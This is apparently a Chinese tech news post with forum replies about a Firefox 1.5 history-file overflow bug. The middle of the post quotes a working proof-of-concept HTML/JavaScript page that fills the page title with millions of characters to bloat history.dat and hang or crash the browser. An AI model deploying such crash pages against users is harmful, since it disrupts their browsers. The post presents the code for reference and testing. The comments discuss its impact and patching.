Firefox 1.5恶意代码现身

Firefox也开始面临微软IE的尴尬局面－－越来越多“安全”人士开始为Firefox找漏洞，这不，Packetstorm Security昨天刚刚公布了Firefox最新1.5版的缓存溢出漏洞恶意代码。

    该代码利用Firefox 1.5历史数据库无法处理超长页面的Bug，采用该代码的网页将直接导致Firefox崩溃。

    解决该漏洞的唯一方式－－在Firefox启动前删除history.dat文件。“该隐患经过测试确实存在，目前尚未有任何补丁发布，”SANS Internet Storm Center的John Bambenek表示，“不过，该漏洞仅会导致Firefox崩溃，目前尚不会造成更多危害。”
以下是引用片段，仅供参考和学习测试：
<html><head><title>heh</title><script type="text/javascript">
function ex() {
        var buffer = "";
        for (var i = 0; i < 5000; i++) {
                buffer += "A";
        }
        var buffer2 = buffer;
        for (i = 0; i < 500; i++) {
                buffer2 += buffer;
        }
        document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
</a></body></html>

点按钮时只是标题变成5000×500个A，没事
但是这是要写到“历史”里，history.dat里也就多了一堆00A$
体积暴增……
关掉FF再打开就要好久才能正常使用

没有太大危害，仅仅是要关掉再开才会体现出来，很久才能正常使用，崩溃倒不会

这有什么好尴尬的？
开源软件就是需要大家一起来发现问题和完善的
只有商业软件并且是某某大头才会有尴尬

刚把补丁打上。

这有什么好尴尬的？
开源软件就是需要大家一起来发现问题和完善的
只有商业软件并且是某某大头才会有尴尬

不错

fx的使用者越多，漏洞就会逐渐显现出来。。

不可能有没漏洞的软件。。fx也一样。。

只是fx当初的宣传者，一直声称没有漏洞。。这种不负责任的宣传方式，也让很多人对fx产生了厌恶

楼上的从哪儿看到Mozilla说过FF没有漏洞了？

CrossBud：这有什么好尴尬的？
开源软件就是需要大家一起来发现问题和完善的
只有商业软件并且是某某大头才会有尴尬回到原帖

軟件有BUG是很正常的事，出補丁解決就是了，還分什麼開源商業。
沒矛盾製造矛盾。

呵呵，楼上的很赞同微软出补丁的速度了

CrossBud：楼上的从哪儿看到Mozilla说过FF没有漏洞了？回到原帖

我说的是某些“宣传者”说的。。